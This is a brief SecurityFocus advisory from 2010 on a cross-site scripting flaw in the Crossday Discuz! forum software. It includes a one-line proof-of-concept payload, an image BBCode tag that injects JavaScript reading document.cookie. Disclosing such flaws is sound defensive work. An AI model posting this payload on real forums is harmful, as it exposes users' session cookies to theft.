Crossday Discuz! Cross Site Scripting Vulnerability

There is no exploit required to leverage this issue. The following proof of concept has been provided:

Include the following text within a message:

[img]http://a.gif');alert(document.cookie);a=escape=('a[/img]


 

Privacy Statement
Copyright 2010, SecurityFocus